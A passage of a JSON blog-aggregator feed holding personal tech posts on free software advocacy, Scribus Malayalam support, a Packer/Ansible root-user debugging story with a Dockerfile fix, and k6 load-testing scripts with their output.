Earlier they were using Adobe PageMaker for publishing, which supported only ASCII encoding. They considered moving to better software for publishing in Malayalam. Many suggested they try Adobe InDesign, but they realized they would need to pay a hefty subscription fee, which they could not afford. They came across community members of FSCI (Free Software Community of India), who suggested they use Scribus for their publishing work. They don’t have to pay any subscription fee to use it, and it supports Malayalam.\nThe developers of Scribus had only added support for Latin-script languages, like English, Spanish, etc. The Oman government funded support for non-Latin languages in Scribus through the Complex Text Layout feature, because they wanted support for the Arabic language. This made it possible to add Malayalam support to Scribus.\nThis was done independently of the developers of Scribus. That is because Scribus is Free Software (free as in freedom, not price), which means anyone can adapt Scribus to their needs. Such a thing is not possible with Adobe’s software, as it is proprietary and only its developers can make changes.\nWhat will you do if the developer of a proprietary program does not care about the feature you want? Maybe the developers don’t care about supporting your language. In the case of Free Software, such changes are possible independent of the developers’ wishes. Further, the project funded by the Oman government helped people in India publish in their language. That is because users get the freedom to share modified versions of Free Software. And thus, any added feature helps the whole society.",[],{"slug":1898,"title":1899,"link":1900,"pubDate":1901,"contentSnippet":1902,"tags":1903,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"the-importance-of-communities","The Importance of Communities","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fthe-importance-of-communities\u002F","Sun, 21 Nov 2021 00:00:00 +0000","Wikipedia defines ‘Community’ as:\nA community is a social unit (a group of living things) with commonality such as norms, religion, values, customs, or identity.\nCommunities can be of many types, and they may exist for different sets of goals. In this post, I will share my experience with the free software community that I am part of and its importance in my life. The topic was touched on earlier in this blog post by FSCI. The point there was that communities can self-host and maintain free-software-powered services for the benefit of all, because every individual self-hosting their own services is neither possible (for, say, people who do not know how) nor sustainable. Therefore, people can collaborate and run services.\nThat aspect is very important and helps me greatly in my use of free software. In this post, I will touch on another aspect of the importance of communities, that is, the psychological boost that we get from being in a group which shares our goals. I continually say that I use only free software for my computing. But how is that possible in an era where proprietary software dominates? First comes my realization that software must respect users’ freedom. Then, my willpower to use only free\u002Fswatantra software. Then I also rely on the aspect touched on earlier in this post: community-run services. I use community-run services (like the ones by FSCI) for my daily use. Abhas’ services have helped me a lot too.
But one of the most important aspects is that I am part of a community which has the goal of promoting freedom-respecting software and is full of people who understand the value of privacy. I think that if I were doing it all alone, I would probably have been demotivated; I don’t know if I would have been able to keep it up. I keep getting demotivated, but when I see that I am not alone in this activism, it definitely helps. I also have friends from Free Software communities outside of FSCI, many of whom I know from Mastodon.\nAlso, I like how our community is inclusive and welcoming to all. Plus, it is nonhierarchical too. This aspect has made me hate hierarchical and centralized social structures as well (more on this later ;) ). We are also working on increasing the diversity in the community. I hope that people from all backgrounds (and not only the privileged) get the benefits and freedom that freedom-respecting software provides to the user.\nI wanna thank you all for making this possible :)\nSimilar read: Arun Mathai also has a post on why he likes communities.",[],{"slug":1905,"title":1906,"link":1907,"pubDate":1908,"contentSnippet":1909,"tags":1910,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"upload-on-wikimedia","Contribute to Wikimedia Commons","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fupload-on-wikimedia\u002F","Wed, 17 Nov 2021 00:00:00 +0000","If you have an image or a photo that you have taken which is useful for informative purposes, you can upload it to Wikimedia Commons.\nAll users of files found on Wikimedia Commons must be given the Four Freedoms:\nThe freedom to use the media.\nThe freedom to study the media and use information gained from it.\nThe freedom to make and distribute copies of the media.\nThe freedom to make changes to the media and distribute derived versions.\nI publish my images under a copyleft license, which means that if you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original, thus protecting every user’s (whoever uses that image) freedom. One such license is CC-BY-SA 4.0.\nYou can upload your images to Wikimedia Commons as well. Whenever you have a photo you shot and want to contribute it to the public so that others can use it in their work, upload it to Wikimedia Commons.\nA federated and decentralized version of Wikimedia Commons would be good. Currently it is centralized and all the images are on one server. We could store these images in many places to avoid a single point of failure.\nThanks to sahilister, who suggested I upload there.",[],{"slug":1912,"title":1913,"link":1914,"pubDate":1915,"contentSnippet":1916,"tags":1917,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"debugging-packer-ci","Debugging issues with Packer and Ansible in Docker","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdebugging-packer-ci\u002F","2021-11-15T18:30:00.000Z","Today I faced an issue that questioned my sanity. Since I didn’t find many “related” issues on StackOverflow\u002FGoogle-fu, except a lone GitHub thread where a kind stranger hinted at what could be the issue, I am writing about it here in the hope (although I don’t wish this torture on anyone) that it helps someone!\nTo give some context, I am running a Gitlab CI job that bakes an AMI using Packer. Packer can use different kinds of provisioners to configure stuff on the host and then prepare the image.
I am using the Ansible provisioner to install and configure Consul. At this point you may think this post is sponsored by Hashicorp by the sheer mention of all their products, but I assure you that is not the case.\nAnyway, so this role works locally but it fails on the damn Gitlab CI. Classic case of Works on my machine, Ops problem now. These kinds of issues, though, are particularly exciting for me because they give me a chance to dig deeper into the internals and slowly peel apart layers to figure out where the “drift” between local and CI is happening.\nHere’s the relevant Packer snippet (Oh and this week as I updated myself with new Packer releases, it’s now possible to write Packer config with HCL and not just JSON anymore! Yayie. Again a reminder: not a sponsored post).\nbuild {\n  sources = [\"source.amazon-ebs.golden-ami\"]\n  provisioner \"ansible\" {\n    playbook_file           = \"${var.playbook_file}\"\n    extra_arguments         = [\"--tags\", \"install\", \"-e\", \"ansible_python_interpreter=\u002Fusr\u002Fbin\u002Fpython3\"]\n    ansible_env_vars        = [\"ANSIBLE_LOCAL_TEMP=$HOME\u002F.ansible\u002Ftmp\", \"ANSIBLE_REMOTE_TEMP=$HOME\u002F.ansible\u002Ftmp\"]\n    galaxy_file             = \"${var.galaxy_file}\"\n    inventory_file_template = \"[consul_instances]\\n{{ .HostAlias }} ansible_host={{ .Host }} ansible_user={{ .User }} ansible_port={{ .Port }}\\n\"\n  }\n}\nRunning packer build in CI results in a failure of a task defined in the Ansible playbook. The task simply creates a new group:\n- name: Add Consul group\n  group:\n    name: \"{{ consul_group }}\"\n    state: present\n  when:\n    - consul_manage_group | bool\ngroup runs the groupadd command behind the scenes, and you need to be in the list of sudoers to actually create new groups. Since I already have become: true and become_user: root in my playbook, that requirement is fulfilled. Moreover, this task runs just fine locally, as I mentioned above. While running in CI, I see the following error:\namazon-ebs.golden-ami: TASK [consul : Add Consul group] ***********************************************\namazon-ebs.golden-ami: fatal: [default]: FAILED! => {\"changed\": false, \"msg\": \"groupadd: Permission denied.\\ngroupadd: cannot lock \u002Fetc\u002Fgroup; try again later.\\n\", \"name\": \"consul\"}\nErhm, okayyy. That looks like a permission error. But why this did not happen locally was the question eating me up.\nNow was the time to start from the ground up and dissect the different things going on here. I will add a small hint though: The Gitlab CI runner is a Docker-based runner. That means all the commands like packer build etc happen inside a Docker container. I am using the hashicorp\u002Fpacker:light image, which is an Alpine-based image containing just the packer executable.\nI tried to run the container locally with:\ndocker run -v `pwd`:\u002Fapp --rm -it --entrypoint='' hashicorp\u002Fpacker:light sh\nAnd yes. When I ran packer build, I could replicate the issue here! But wait. More questions than answers. Ansible would run this groupadd command on the remote host, right? Why does Ansible care if it’s inside a container or not? So, I created a really simple playbook to reproduce this further.\n- name: Assemble Consul cluster\n  hosts: localhost\n  any_errors_fatal: true\n  become: true\n  become_user: root\n  tasks:\n    - name: Add Consul group\n      group:\n        name: debug_consul\n        state: present\nI ran this (ansible-playbook test.yml) inside the container and… it worked! (The exact in-container steps are sketched below.)
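For reference, a minimal sketch of that in-container reproduction, assuming Ansible can be installed from Alpine’s package repositories (the apk package name ansible is an assumption; test.yml is the playbook shown above):\ndocker run -v `pwd`:\u002Fapp --rm -it --entrypoint='' hashicorp\u002Fpacker:light sh\n# Inside the container, which runs as root (the crux of the bug):\napk add --no-cache ansible   # assumption: ansible is packaged in Alpine's repos\ncd \u002Fapp\nansible-playbook test.yml    # succeeds when run directly; only the Packer-wrapped run fails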
Okay, now it’s becoming clear. We aren’t executing ansible-playbook directly; it’s being wrapped by Packer. So this is clearly getting messed up by Packer. This time I did find a GitHub issue where people were asking about similar issues, and this person described it well:\n[quoted comment not reproduced in this snippet]\nI opened the Packer docs again and that’s when I read this:\nWe recommend against running Packer as root; if you do then you won’t be able to successfully run your Ansible playbook as root; become: yes will fail.\nWTF!!! This was right there in the docs, hiding in plain sight. Sheesh!\nOkay, so I cannot run my playbook with become: true with the packer image (which uses the root user). Time to fix that by building a custom image. That is because Gitlab CI won’t let me change the user without hacking stuff. And a custom image also allows me to ditch Alpine for Ubuntu, which is what I prefer.\nFROM ubuntu:latest\n\nRUN apt-get update && apt-get install -y \\\n    python3 \\\n    git \\\n    curl \\\n    unzip \\\n    python3-pip \\\n    && rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F*\n\nRUN curl -o packer.zip https:\u002F\u002Freleases.hashicorp.com\u002Fpacker\u002F1.7.8\u002Fpacker_1.7.8_linux_amd64.zip\nRUN unzip packer.zip\nRUN mv packer \u002Fusr\u002Flocal\u002Fbin\n\nRUN pip3 install ansible\n\nRUN useradd -rm -d \u002Fhome\u002Fubuntu -s \u002Fbin\u002Fbash -g root -G sudo -u 1000 ubuntu\nUSER ubuntu\n\nWORKDIR \u002Ftmp\n\nENV PATH=\"$HOME\u002F.local\u002Fbin:$PATH\"\n\nWORKDIR \u002Fapp\nUsing this custom image, the packer build worked just fine. Fun day indeed (\u002Fs).\nFin!",[],{"slug":1919,"title":1920,"link":1921,"pubDate":1922,"contentSnippet":1923,"tags":1924,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-43","Systems, Scale, Value","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsystems-scale-value\u002Findex.html","Sat, 13 Nov 2021 00:00:00 +0000","Creating things is a delicate endeavour, fraught with peril. People struggle forward through crazy marketplace and environmental complexities just to get from one day to the other. Yet I can't shake off the feeling that we make it harder for ourselves than it should be. I've been trying to work out why. There's a lot to unpack. This post is a start at thinking about it in public.",[723,1788,1346],{"slug":1926,"title":1927,"link":1928,"pubDate":1929,"contentSnippet":1930,"tags":1931,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-44","In the beginning, was the domain name","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhello-world\u002Findex.html","Wed, 10 Nov 2021 00:00:00 +0000","How this blog came to be is a minor miracle. Long story short, I conned myself into believing nobody will find \u002Fand\u002F read it. But you're here, aren't you? And you're reading this. Aren't You? Confucamus. Well, here's how you got here.",[1932,457,54],"hello_world",{"slug":1934,"title":1935,"link":1936,"pubDate":1937,"contentSnippet":1938,"tags":1939,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"load-testing-k6","Load testing with K6","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fload-testing-k6\u002F","2021-10-28T18:30:00.000Z","This week I was occupied with optimising a Golang program I’d written at work. I wanted a way to reproduce the issue under heavy load on my development environment, and load tests are a good way to do that.\nThe service in question is a RESTful API, so it’s relatively easy to use any HTTP load-testing tool.
The endpoint had an input parameter uuid which accepted a valid UUIDv4 as the input. To my surprise, this was not so straightforward with hey (which is my tool of choice for simple tests) and ab. While it was possible to write an external script to do that, I thought I’d look around at some “scriptable” alternatives. I found wrk, which allowed me to write custom Lua modules. Now, I didn’t want to lose focus from the main task (load testing my service) by writing Lua, so I didn’t use wrk, but it’s still a pretty decent option (and very, very fast at that).\nHello k6!#\n\nSome more Google-fu resulted in me finding k6. I’d never heard of it, but after exploring the GitHub repo and the docs it looked like a pretty active project.\nSo, k6 basically allows you to write scripted tests covering a variety of scenarios. The scripts are written in JavaScript and treated as ES6 modules for extensibility. k6 has a concept of Virtual Users to mimic a real-world user. Each VU runs the “script” in an isolated, self-contained JS runtime using Goja. Now obviously at this point, if speed is your utmost concern for generating very heavy load tests, I guess wrk is your only real choice, as invoking a JS runtime inside Go won’t be super fast. But for most use cases and people, like my case, this will be just fine.\nBasic Usage#\nAnyway, I quickly grokked the docs, copy-pasted some examples and modified them to what I needed. I was able to get a basic load test running very quickly and admired the simplicity here. It generated some p90, p95 etc. stats which were helpful to look at. Here’s a basic example of how the script looks:\nimport http from 'k6\u002Fhttp';\nimport { check, sleep } from 'k6';\nimport { Rate } from 'k6\u002Fmetrics';\nimport { uuidv4 } from \"https:\u002F\u002Fjslib.k6.io\u002Fk6-utils\u002F1.0.0\u002Findex.js\";\n\nexport const errorRate = new Rate('errors');\n\nexport default function () {\n  const url = 'https:\u002F\u002Fhttpbin.org\u002Fpost';\n  const params = {\n    headers: {\n      'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    },\n  };\n\n  const data = {\n    custname: \"hello\",\n    comments: uuidv4(),\n  };\n  check(http.post(url, data, params), {\n    'status is 200': (r) => r.status == 200,\n  }) || errorRate.add(1);\n\n  sleep(0.5);\n}\nTo run it:\nk6 run -d 10s -u 10 httpbin_load.js\n(Here -d is the duration to run the test and -u specifies the number of Virtual Users.)\nExplanation:\nIt’s an HTTP POST request with some form data to https:\u002F\u002Fhttpbin.org\u002Fpost\nWe use the uuidv4 function because the JS stdlib is great at providing basic helper methods (\u002Fs)\nWe define a check for HTTP status code 200. Later we’ll see how to add more real-world checks under heavy load.\nWe have a sleep function to pause a little bit before each iteration. This is pretty important, as leaving out sleep is akin to a user pressing F5 on a browser non-stop, and you’d probably not want your load tests to be that aggressive. Read the docs for more info.\nOutput:\n❯ k6 run -d 30s -u 10 test.js                   \n\n          \u002F\\      |‾‾| \u002F‾‾\u002F   \u002F‾‾\u002F   \n     \u002F\\  \u002F  \\     |  |\u002F  \u002F   \u002F  \u002F    \n    \u002F  \\\u002F    \\    |     (   \u002F   ‾‾\\  \n   \u002F          \\   |  |\\  \\ |  (‾)  | \n  \u002F __________ \\  |__| \\__\\ \\_____\u002F .io\n\n  execution: local\n     script: test.js\n     output: -\n\n  scenarios: (100.00%) 1 scenario, 10 max VUs, 1m0s max duration (incl. 
graceful stop):\n           * default: 10 looping VUs for 30s (gracefulStop: 30s)\n\n\nrunning (0m30.6s), 00\u002F10 VUs, 387 complete and 0 interrupted iterations\ndefault ✓ [======================================] 10 VUs  30s\n\n     ✓ status is 200\n\n     checks.........................: 100.00% ✓ 387       ✗ 0   \n     data_received..................: 318 kB  10 kB\u002Fs\n     data_sent......................: 78 kB   2.5 kB\u002Fs\n     http_req_blocked...............: avg=28.65ms  min=210ns    med=857ns    max=1.1s     p(90)=1.49µs   p(95)=1.68µs  \n     http_req_connecting............: avg=7.77ms   min=0s       med=0s       max=301.24ms p(90)=0s       p(95)=0s      \n     http_req_duration..............: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n       { expected_response:true }...: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n     http_req_failed................: 0.00%   ✓ 0         ✗ 387 \n     http_req_receiving.............: avg=177.35µs min=39.43µs  med=170.18µs max=604.22µs p(90)=259.75µs p(95)=285.73µs\n     http_req_sending...............: avg=268.41µs min=48.62µs  med=216.61µs max=7.95ms   p(90)=334.94µs p(95)=448.21µs\n     http_req_tls_handshaking.......: avg=15.87ms  min=0s       med=0s       max=615.25ms p(90)=0s       p(95)=0s      \n     http_req_waiting...............: avg=253.61ms min=215.34ms med=230.77ms max=826.57ms p(90)=316.98ms p(95)=324.69ms\n     http_reqs......................: 387     12.666038\u002Fs\n     iteration_duration.............: avg=784ms    min=717ms    med=732.43ms max=1.92s    p(90)=820.35ms p(95)=926.87ms\n     iterations.....................: 387     12.666038\u002Fs\n     vus............................: 10      min=10      max=10\n     vus_max........................: 10      min=10      max=10\nThings to look for:\nFrom the above output, I think these 2 metrics are the most important to look at:\n     http_req_duration..............: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n     http_reqs......................: 387     12.666038\u002Fs\nWe see the total requests sent in 30s were 387 and the p95 response time is 325.1ms.\nTesting some real-world scenarios#\nThis was a really simple example but we can add some more scenarios to mimic real-world checks. 
Let’s tweak the script to\nGo from 1 to 10 users in 10s.\nStay at 10 users for 5s.\nRamp down to 0 users over the next 15s.\nHave a threshold of not exceeding 500ms as p95.\nHave a threshold on the rate of non-200 OK responses.\nThe above script now becomes:\nimport http from 'k6\u002Fhttp';\nimport { check, sleep } from 'k6';\nimport { Rate } from 'k6\u002Fmetrics';\nimport { uuidv4 } from \"https:\u002F\u002Fjslib.k6.io\u002Fk6-utils\u002F1.0.0\u002Findex.js\";\n\nexport const errorRate = new Rate('non_200_requests');\n\nexport let options = {\n    stages: [\n        \u002F\u002F Ramp-up from 1 to 10 VUs in 10s.\n        { duration: \"10s\", target: 10 },\n\n        \u002F\u002F Hold steady at 10 VUs for 5s.\n        { duration: \"5s\", target: 10 },\n\n        \u002F\u002F Linearly ramp down from 10 to 0 VUs over the last 15s.\n        { duration: \"15s\", target: 0 }\n    ],\n    thresholds: {\n        \u002F\u002F We want the 95th percentile of all HTTP request durations to be less than 500ms\n        \"http_req_duration\": [\"p(95)\u003C500\"],\n        \u002F\u002F Thresholds based on the custom metric `non_200_requests`.\n        \"non_200_requests\": [\n            \u002F\u002F Global failure rate should be less than 1%.\n            \"rate\u003C0.01\",\n            \u002F\u002F Abort the test early if it climbs over 5%.\n            { threshold: \"rate\u003C=0.05\", abortOnFail: true },\n        ],\n    },\n};\n\nexport default function () {\n  const url = 'https:\u002F\u002Fhttpbin.org\u002Fpost';\n  const params = {\n    headers: {\n      'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    },\n  };\n\n  const data = {\n    custname: \"hello\",\n    comments: uuidv4(),\n  };\n  check(http.post(url, data, params), {\n    'status is 200': (r) => r.status == 200,\n  }) || errorRate.add(1);\n\n  sleep(Math.random() * 1 + 1); \u002F\u002F Random sleep between 1s and 2s.\n}\nRun with k6 run test.js:\n❯ k6 run test.js\n\n          \u002F\\      |‾‾| \u002F‾‾\u002F   \u002F‾‾\u002F   \n     \u002F\\  \u002F  \\     |  |\u002F  \u002F   \u002F  \u002F    \n    \u002F  \\\u002F    \\    |     (   \u002F   ‾‾\\  \n   \u002F          \\   |  |\\  \\ |  (‾)  | \n  \u002F __________ \\  |__| \\__\\ \\_____\u002F .io\n\n  execution: local\n     script: test.js\n     output: -\n\n  scenarios: (100.00%) 1 scenario, 10 max VUs, 1m0s max duration (incl. 
graceful stop):\n           * default: Up to 10 looping VUs for 30s over 3 stages (gracefulRampDown: 30s, gracefulStop: 30s)\n\n\nrunning (0m30.3s), 00\u002F10 VUs, 105 complete and 0 interrupted iterations\ndefault ✓ [======================================] 00\u002F10 VUs  30s\n\n     ✓ status is 200\n\n     checks.........................: 100.00% ✓ 105      ✗ 0   \n     data_received..................: 126 kB  4.2 kB\u002Fs\n     data_sent......................: 25 kB   841 B\u002Fs\n     http_req_blocked...............: avg=73.69ms  min=292ns    med=761ns    max=1.02s    p(90)=1.54µs   p(95)=688.76ms\n     http_req_connecting............: avg=21.67ms  min=0s       med=0s       max=245.46ms p(90)=0s       p(95)=223.77ms\n   ✓ http_req_duration..............: avg=252.72ms min=215.88ms med=230.31ms max=560.17ms p(90)=299.12ms p(95)=406.94ms\n       { expected_response:true }...: avg=252.72ms min=215.88ms med=230.31ms max=560.17ms p(90)=299.12ms p(95)=406.94ms\n     http_req_failed................: 0.00%   ✓ 0        ✗ 105 \n     http_req_receiving.............: avg=177.85µs min=103.82µs med=163.76µs max=366.5µs  p(90)=235.86µs p(95)=266.39µs\n     http_req_sending...............: avg=258.17µs min=96.92µs  med=215.88µs max=958.67µs p(90)=410.05µs p(95)=487.18µs\n     http_req_tls_handshaking.......: avg=50.22ms  min=0s       med=0s       max=614.14ms p(90)=0s       p(95)=460.3ms \n     http_req_waiting...............: avg=252.29ms min=215.17ms med=229.69ms max=559.86ms p(90)=298.42ms p(95)=406.52ms\n     http_reqs......................: 105     3.471037\u002Fs\n     iteration_duration.............: avg=1.84s    min=1.22s    med=1.85s    max=3.02s    p(90)=2.22s    p(95)=2.46s   \n     iterations.....................: 105     3.471037\u002Fs\n     vus............................: 1       min=1      max=10\n     vus_max........................: 10      min=10     max=10\nWe can see that all the checks passed without breaching any thresholds we’d set.\nSome important points:\nIn my local environment, I stress tested my service with 10k VUs, which is quite a high number for the service, but it was good to see it hold under extreme conditions as well. An important thing to note if you are spawning many VUs is that the ulimit value should be high. This is described in their docs as well.\nTo debug the HTTP response you can run with the --http-debug=\"full\" flag and get verbose output for debugging.\nSummary#\nI’ve barely scratched the surface of what this tool does. You can export metrics to various data sources, add a lot more checks on the response code, and use it with gRPC or WebSockets as well.\nOverall, pretty happy with this tool, and I am going to use more of it for future projects.\nReferences#\nhttps:\u002F\u002Fk6.io\u002Fblog\u002Fcomparing-best-open-source-load-testing-tools\u002F\nhttps:\u002F\u002Fk6.io\u002Four-beliefs\u002F#simple-testing-is-better-than-no-testing\nhttps:\u002F\u002Fk6.io\u002Fdocs\u002F\nhttps:\u002F\u002Fgithub.com\u002Fgrafana\u002Fk6\nFin",[],{"slug":1941,"title":1942,"link":1943,"pubDate":1944,"contentSnippet":1945,"tags":1946,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"free-software-important-for-privacy","Why Free Software and decentralization are necessary for privacy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffree-software-important-for-privacy\u002F","Tue, 26 Oct 2021 00:00:00 +0000","Free Software means software which respects users’ freedom.
It does not mean that users get the software without paying, or free of cost. Free Software is a matter of liberty, not price. I sometimes call it swatantra\u002Fmukt software to clarify this point.\nPrecisely, Free Software gives users the following freedoms:\nFreedom 0: Freedom to run the software;\nFreedom 1: Freedom to study and modify the software. Users must have the source code of the software to exercise this freedom;\nFreedom 2: Freedom to share the software;\nFreedom 3: Freedom to share your modified versions;\nSoftware which lacks any of these freedoms is called nonfree\u002Fproprietary software. Much of the well-known proprietary software is malware.\nIf we do not have the source code of the software, we cannot inspect it to see whether it has malicious functionality. In particular, we cannot inspect whether the software has spyware or not. Even if we get the source code, we cannot remove the spyware unless we can modify it. In view of this, freedom 1 is a precondition for user privacy.\nIf users cannot share the software, then they need to inspect the software themselves to know whether it has some spying functionality or not. Sharing the software allows us to give a copy to someone who can inspect it. For example, nonprogrammers can share a copy of the software with someone to get it inspected for malicious functionality, maybe in exchange for a fee. When we don’t know how to repair a fan, a bicycle or a car, we give it to a mechanic who repairs it for us. The case of software is similar.\nLet’s say someone removed spyware from a program; they can then share their modifications with others if Freedom 3 is granted. If Freedom 3 is not granted, then everyone needs to make the modification themselves, which is a lot of redundant work.\nThese freedoms give users collective control over the software. That collective control is necessary for users to get privacy. Nonfree software cannot be trusted for privacy. Please note that Free Software might not be sufficient for privacy. It is a precondition for privacy.\nFor example, the Ubuntu operating system is Free Software, and it contained spyware in older versions. With Free Software, users have a defence: they can remove those malicious functionalities. With proprietary software, there is no such chance.\nAnother factor is decentralization. What I mean by decentralization is that network-based services allow self-hosting and federation. Please read this article by FSCI for details on how decentralization, in combination with Free Software and end-to-end encryption, can give you privacy.\nI will summarize the article for you here. Basically, when we use software installed on someone else’s computers (called servers), like Google Docs, we lose control over our computing. This is because all communications, say, in the case of Google Docs, will go via Google’s servers. Since we are using Google’s computers for our computing, they can log our activities and put us under surveillance. If the server is under our control, or a trusted one, then this is not a problem, but services like Google Docs do not allow users to deploy them on their own server (and even if they did, it would not be advisable, since Google Docs is nonfree software). So we need the freedom to self-host, which means the freedom to run our own servers. This does not mean we have to run our own server. Granting users the freedom to self-host gives rise to many service providers.
Then we can choose one which we trust, or pay someone to deploy our server.\nFederation means that two users using different service providers can communicate. This is required; otherwise, when we switch service providers, we need to make the effort to switch every contact to the new provider. Federation allows us to switch service providers without other contacts switching theirs.\nExamples of free-software-powered federated systems are Matrix, XMPP and Mastodon. The Searx search engine is an example where self-hosting is allowed but the concept of federation does not apply.\nTo illustrate, take the example of the Matrix chat system. A user registered on service provider 1 can contact users on service provider 2 on Matrix. All messages are end-to-end encrypted. And since the servers are under users’ control, they can control the policies and what data is being collected.\nThe conclusion is: Free Software and decentralization are necessary for privacy. Proprietary software and centralized services cannot be trusted for privacy.",[],{"slug":1948,"title":1949,"link":1950,"pubDate":1951,"contentSnippet":1952,"tags":1953,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"javascript-ecosystem-software-development-are-a-hot-mess","The Javascript \"ecosystem\" is a hot mess and so is software development in general","https:\u002F\u002Fnadh.in\u002Fblog\u002Fjavascript-ecosystem-software-development-are-a-hot-mess\u002F","Sat, 16 Oct 2021 00:00:00 +0000","I have a small Vue 2 project (an admin UI for dictmaker) that I created with vue cli six months ago. Today, I picked it up again to finish it, and started out by doing a yarn upgrade. Of course, blindly upgrading all dependencies is never a good idea, but this is a tiny WIP project with just one dependency that I added, and there is a constant stream of GitHub dependabot alerts every month forcing me to upgrade some dependency or another, so what is the worst that could happen? At least that is what I thought.",[],{"slug":1955,"title":1956,"link":1957,"pubDate":1958,"contentSnippet":1959,"tags":1960,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"problems-with-protonmail","Problems with Protonmail","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fproblems-with-protonmail\u002F","Thu, 30 Sep 2021 02:06:19 +0530","Protonmail claims to automatically send end-to-end encrypted messages between all Protonmail users. They claim that they do not have access to users’ private keys (someone having access to your private keys can decrypt and read all your encrypted messages), by encrypting each user’s private keys with the hash generated from the user’s password (which is known only to the user). The problem with this is: how do we know that Protonmail does not keep a copy of users’ private keys before encrypting them with the user’s password hash? Also, we cannot really inspect the web application we use in the browser, because it is not installed on our own devices; we are using it from Protonmail’s computers.\nThere is no need to trust the server for email encryption. Email encryption can be done within the app. This method encrypts mails within the app before sending them to the server. Here is a guide to encrypting mails using the pEp app. pEp encrypts mails very easily. You just have to send one mail to a pEp user to exchange keys, and after that, all emails will be encrypted by default. Email encryption used to be hard to use, but that is no longer the case. (A minimal command-line sketch of app-side encryption follows.)
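To make app-side encryption concrete, here is a minimal sketch using the standard GnuPG CLI; OpenPGP-capable apps like pEp or Thunderbird automate exactly these steps for you (the file names and address below are hypothetical):\n# Import the recipient's public key (file name is hypothetical):\ngpg --import alice_pubkey.asc\n# Encrypt the message body locally, before it ever reaches the mail server:\ngpg --encrypt --armor --recipient alice@example.org message.txt\n# message.txt.asc now holds ciphertext that only Alice's private key can decrypt.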
The pEp project has made email encryption (it uses OpenPGP) easier, so that nontechnical people also have access to it.\nThis is the main problem with Protonmail. When it comes to encrypting emails, there is no inherent need for the user to trust the server side for encryption, yet their whole model of encryption rests on trusting the server side. We cannot inspect their server side. We cannot inspect what they run or how they implement all this on their own computers. You can, however, inspect the app running on your own device if the app is free software.\nConclusion: Email encryption does not require the user to trust the service provider. Users can encrypt emails on their device before sending the mail. Protonmail is making its users trust the server side for email encryption without any need for that. I advise against using email from such providers; instead, use email providers which allow you to use an independent app like pEp, Thunderbird or K-9 Mail, so that you can encrypt emails before sending them to the server.",[],{"slug":1962,"title":1963,"link":1964,"pubDate":1965,"contentSnippet":1966,"tags":1967,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"story-of-this-website","Story of creation of this website","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fstory-of-this-website\u002F","Tue, 28 Sep 2021 00:00:00 +0000","This is the story of how the website you are reading was created.\nI have wanted to create a website for as far back as I can remember. This is because I wanted autonomy over the content that I post. The social media posting format is not suitable for a website like this. Also, the website has a cool domain in my name, which feels really good.\nIn the Software Freedom Camp 2020, I met Sahil and Arun. Sahil already had a website, while Arun purchased a domain name around that time. I got inspired by Arun and bought this domain from gandi.net in October 2020.\nThen I took up a project in Free Software Camp 2020 to learn Hugo. I didn’t learn much from there, as I didn’t put a lot of time and effort into it.\nAfter the domain purchase, the website wasn’t up for 9 months. Finally, in July 2021, Sahil helped me set up this website. And after tinkering with the website, I learnt enough Hugo and git to maintain it. And here I am, writing the story of the website.",[],{"slug":1969,"title":1970,"link":1971,"pubDate":1972,"contentSnippet":1973,"tags":1974,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fscamp-2020-as-learner","My experience as a learner in Free Software Camp 2020","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffscamp-2020-as-learner\u002F","Mon, 27 Sep 2021 00:00:00 +0000","Index\nIntroduction\nWhat is Free Software Camp\nMotivation to join the camp\nHow I came to know about the camp\nExperience as a learner in the camp\nAftermath\nWord for learners of the upcoming camps\nIntroduction\nI participated as a learner in Free Software Camp 2020, organized by FSCI and FSF India. This is a post about my experience of the same. If you don’t know what free software is, then you can read my article on the same.\nI have never attended any software-related camp other than this one, and therefore I have no idea what other camps are about, so I cannot compare this camp with any other camp of a technical nature or one which involves introducing free software philosophy to the participants.
Since the camp concluded long before I am writing this post, there is a chance I have forgotten a lot of things about it, or my feelings\u002Fopinions about many things at that time.\nWhat is Free Software Camp\nThis is my takeaway of what the free software camp means. I think that the camp had two goals:\nTo acquaint the participants with free software philosophy.\nTo connect the learners with mentors and contribute to free software projects. These contributions don’t have to be technical in nature, but they must contribute to free software in some way.\nThe camp was divided into the following phases:\nIce breaking sessions.\nIntroduce the learners to free software philosophy.\nGNU\u002FLinux installation phase.\nA phase where we get to meet people who earn their living from free software.\nProjects phase.\nMotivation to join the camp\nI was already introduced to free software philosophy and started caring about the idea in 2020. The main thing I was wondering around September 2020 was: how does free software actually work in reality? I was not aware of the communities that power free software. Curiosity to know how free software works was one motivation to join the camp.\nAlso, before the start of the camp, I had already started shifting to free software, but I needed help on: 1. which software people from the free software community use; and 2. trying and testing that 